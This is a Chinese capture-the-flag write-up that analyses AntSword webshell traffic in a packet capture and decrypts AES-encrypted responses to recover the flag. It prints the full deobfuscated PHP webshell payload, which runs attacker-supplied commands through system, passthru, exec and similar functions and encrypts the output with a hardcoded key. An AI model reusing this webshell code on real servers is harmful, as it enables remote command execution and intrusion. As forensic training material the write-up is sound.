根据题目名称,分析webshell流量,所以我们就过滤http协议
或者更细致一点,POST请求
追踪流
可以看到出题人很贴心,一眼蚁剑
上图下面的部分是chr编码
import re
s = ""
result = re.findall(r'\((0x[0-9a-fA-F]+)\)', s)
print(result)
with open('1.txt' ,'w') as f:
f.write(str(result))
转一下
需要把格式排一排
在线美化工具
@ini_set("display_errors", "0");
@set_time_limit(0);
function asenc($out) {
@session_start();
$key='f5045b05abe6ec9b1e37fafa851f5de9';
return @base_encode(openssl_encrypt(base_encode($out), 'AES-128-ECB', $key, OPENSSL_RAW_DATA));
}
;
;
function asoutput() {
$output=ob_get_contents();
ob_end_clean();
echo "8fc2b";
echo @asenc($output);
echo "bde96";
}
ob_start();
try {
$p=base_decode($_POST["0xc461e86196f1a"]);
$s=base_decode($_POST["0x9ec3fa98a283f"]);
$d=dirname($_SERVER["SCRIPT_FILENAME"]);
$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";
$r="{$p} {$c}";
function fe($f) {
$d=explode(",",@ini_get("disable_functions"));
if(empty($d)) {
$d=array();
} else {
$d=array_map('trim',array_map('strtolower',$d));
}
return(function_exists($f)&&is_callable($f)&&!in_array($f,$d));
}
;
function runcmd($c) {
$ret=0;
if(fe('system')) {
@system($c,$ret);
} elseif(fe('passthru')) {
@passthru($c,$ret);
} elseif(fe('shell_exec')) {
print(@shell_exec($c));
} elseif(fe('exec')) {
@exec($c,$o,$ret);
print(join("
",$o));
} elseif(fe('popen')) {
$fp=@popen($c,'r');
while(!@feof($fp)) {
print(@fgets($fp, 2048));
}
@pclose($fp);
} elseif(fe('antsystem')) {
@antsystem($c);
} else {
$ret = 127;
}
return $ret;
}
;
$ret=@runcmd($r." 2>&1");
print ($ret!=0)?"ret={$ret}":"";
;
}
catch(Exception $e) {
echo "ERROR://".$e->getMessage();
}
;
asoutput();
die();
在后面几个流里面往下拉,都发现了神秘字符串
结合我们上面的发现的key,把这几个当做密文试一试
在流7里面成功了
<?php
$cipher = "8c2b4kRD1eD+vSZ81FAJ6XClabCR0xNFklup5/x+gixas3l0kdMTRZJbqef8foIsWrN5dJHTE0WSW6nn/H6CLFqzeXSR0xNFklup5/x+gixas3l0kdMTRZJbqef8foIsWrN5dZOTFg4DW9MYwG6k3rEvAAR8oFStGnfMRtUJOqc0mgokfKBUrRp3zEbVCTqnNJoKJHygVK0ad8xG1Qk6pzSaCiR8oFStGnfMRtUJOqc0mgokfKBUrRp3zEbVCTqnNJoKJ1qI47Cz1/qfnNoNARGhLfVhC0RJlfeKCvbPwpjFn//BSFY8RJlZyxz1a+TPy0D3cUhWPESZWcsc9Wvkz8tA93FIVjxEmVnLHPVr5M/LQPdxSFY8RJlZyxz1a+TPy0D3cUhWPESZWcsc9Wvkz8tA93GnMvJfVbvphfWnt17IOkzYjvv91k2fnYDR7u4nlGM3YitxGYGs9mn+HS5iJBXORtYrcRmBrPZp/h0uYiQVzkbWK3EZgaz2af4dLmIkFc5G1itxGYGs9mn+HS5iJBXORtUq4dBjDRFhDqDyzs9CScJhrd3yMusQ+qsnZkq4Ey7NVJHTE0WSW6nn/H6CLFqzeXSR0xNFklup5/x+gixas3l0kdMTRZJbqef8foIsWrN5dJHTE0WSW6nn/H6CLFqzeXSR0xNFklup5/x+gixas3l2hDPuDhVN4TaDLzp9bXyfGeCVhvglAaNo2rA/ovnRTTtfA5ZywMOOijj6md5RItqjXwOWcsDDjoo4+pneUSLao18DlnLAw46KOPqZ3lEi2qNfA5ZywMOOijj6md5RItqgS0b9hS7r5TX9YNZo2awgUAyqVacVgwr1NlNQ2k/kihhh0QQfnjeGdZhkz0N0jAKiMzFmAMa7xQ1URxTaHoHjDg3NaWl/8+PVG+pyaKrbNDjfl77POeQE8+0MCHpz6YxWLJ6mwCe1X3uzz/HSHcHSvQBB8FxjOhugOErOXkd3LZi/60Gr4gIEc1JIxA5A2pE/V6Z/DFwNOR4M/IIIWdGr5e2e10";
function decrypt($cipher) {
$key = 'f5045b05abe6ec9b1e37fafa851f5de9';
return @base_decode(openssl_decrypt(base_decode($cipher), 'AES-128-ECB', $key, OPENSSL_RAW_DATA));
};
$cipher = substr($cipher, 5, strlen($cipher) - 10);
echo decrypt($cipher);
?>
运行结果
最后再解码一次
flag{AntSword_is_Powerful_3222222!!!}
总结
主要考察对蚁剑流量的认识和脚本编写,设计蚁剑流量特征和AES加密的理解
之前学习的时候搜集了AES解密工具
但是这次做题并没有很理想地用工具将它解出来
有考虑把开始的base解码成二进制但不是乱码就是报错无法识别
S在线加密解密工具 - MKLab在线工具](https://www.mklab.cn/utils/aes)
但是这次做题并没有很理想地用工具将它解出来
有考虑把开始的base解码成二进制但不是乱码就是报错无法识别
最后填到里面也没有结果,也许这就是工具的局限性吧
